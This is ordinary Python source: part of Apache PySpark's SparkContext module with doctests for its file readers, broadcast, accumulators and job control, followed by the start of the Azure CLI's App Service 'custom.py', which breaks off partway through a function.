[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files::
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
then C{rdd} contains::
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
.. note:: Experimental
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
        .. note:: Small files are preferred; large files are also allowed, but
may cause bad performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
.. note:: Experimental
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
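    # Illustrative sketch (the file path and record layout are assumptions):
    # with fixed 8-byte records, each RDD element is the raw bytes of one
    # record, which can be decoded with the struct module, e.g.
    #
    #   import struct
    #   doubles = sc.binaryRecords("/data/doubles.bin", 8) \
    #               .map(lambda rec: struct.unpack("<d", rec)[0])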
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. C{PickleSerializer} is used to deserialize pickled objects on the Python side
        :param path: path to the sequence file
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter:
:param valueConverter:
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
[u'Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
first = rdds[0]._jrdd
rest = [x._jrdd for x in rdds[1:]]
return RDD(self._jsc.union(first, rest), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a
L{Broadcast<pyspark.broadcast.Broadcast>}
        object for reading it in distributed functions. The variable will
        be sent to each node only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
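    # Usage sketch (illustrative): ship a lookup table to the executors once and
    # read it through .value inside tasks, e.g.
    #
    #   lookup = sc.broadcast({"a": 1, "b": 2})
    #   sc.parallelize(["a", "b", "a"]).map(lambda k: lookup.value[k]).collect()
    #   # -> [1, 2, 1]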
def accumulator(self, value, accum_param=None):
"""
Create an L{Accumulator} with the given initial value, using a given
L{AccumulatorParam} helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
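    # Usage sketch (illustrative): accumulators are write-only on executors and
    # readable on the driver, e.g.
    #
    #   acc = sc.accumulator(0)
    #   sc.parallelize([1, 2, 3, 4]).foreach(lambda x: acc.add(x))
    #   acc.value  # -> 10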
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The C{path} passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use
L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The C{path} passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
if sys.version > '3':
import importlib
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
        directory must be an HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
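    # Usage sketch (the directory is an assumption): checkpointing truncates a
    # long lineage by persisting the RDD to reliable storage, e.g.
    #
    #   sc.setCheckpointDir("hdfs:///tmp/checkpoints")
    #   rdd = sc.parallelize(range(100)).map(lambda x: x * x)
    #   rdd.checkpoint()
    #   rdd.count()  # first action materializes and writes the checkpoint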
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use L{SparkContext.cancelJobGroup} to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> suppress = lock.acquire()
>>> suppress = threading.Thread(target=start_job, args=(10,)).start()
>>> suppress = threading.Thread(target=stop_job).start()
>>> suppress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
        Get a local property set in this thread, or None if it is missing. See
L{setLocalProperty}
"""
return self._jsc.getLocalProperty(key)
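    # Illustrative sketch: the most common local property is the fair-scheduler
    # pool for jobs submitted from the current thread, e.g.
    #
    #   sc.setLocalProperty("spark.scheduler.pool", "low_priority")
    #   # ... actions submitted here run in that pool ...
    #   sc.setLocalProperty("spark.scheduler.pool", None)  # reset to the default pool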
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
        Get SPARK_USER for the user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
        Return a :class:`StatusTracker` object.
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent
from azure.cli.core.profiles import ResourceType, get_sdk
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities.
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
    # Keep the existing appsettings when the webapp is being (re)created with an existing webapp name.
name_validation = client.check_name_availability(name, 'Site')
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
        # portal uses the current_stack property in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
    if using_webapp_up:  # when the routine is invoked as a helper for 'webapp up'
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
if current_stack:
app_metadata = client.web_apps.list_metadata(resource_group_name, name)
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group_name, name, kind="app", properties=app_metadata.properties)
    # Ensure SCC operations follow right after the 'create', with no preceding appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1  # you can only specify one of the combinations
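# Illustrative truth table for validate_container_app_create_options (hypothetical argument values;
# a sketch, not executed by this module):
#   validate_container_app_create_options(runtime='NODE|12-lts')                            -> True
#   validate_container_app_create_options(deployment_container_image_name='nginx:latest')   -> True
#   validate_container_app_create_options(multicontainer_config_type='COMPOSE',
#                                          multicontainer_config_file='docker-compose.yml') -> True
#   validate_container_app_create_options(runtime='NODE|12-lts',
#                                          deployment_container_image_name='nginx:latest')  -> False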
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
if slash_ix == -1:
return None
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if "." not in docker_registry_server_url and ":" not in docker_registry_server_url:
return None
return docker_registry_server_url
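# Illustrative behaviour of parse_docker_image_name (hypothetical image names; a sketch, not executed by this module):
#   parse_docker_image_name('myregistry.azurecr.io/nginx:latest')  -> 'myregistry.azurecr.io'
#   parse_docker_image_name('library/nginx')                       -> None  (no registry host before the image)
#   parse_docker_image_name('nginx:latest')                        -> None  (Docker Hub image, no registry URL)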
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings | --slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list):  # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
# entries flagged (or defaulting) as slot settings go into slot_result
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
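# Illustrative input formats accepted by update_app_settings above (hypothetical names/values;
# a sketch, not executed by this module):
#   update_app_settings(cmd, 'my-rg', 'my-app', settings=['KEY1=value1', 'KEY2=value2'])
#   update_app_settings(cmd, 'my-rg', 'my-app',
#                       settings=['[{"name": "KEY1", "value": "value1", "slotSetting": false}]'])
# The JSON form mirrors the output of the corresponding 'list' command; entries with "slotSetting": true
# are treated as slot settings regardless of whether they were passed via --settings or --slot-settings.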
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
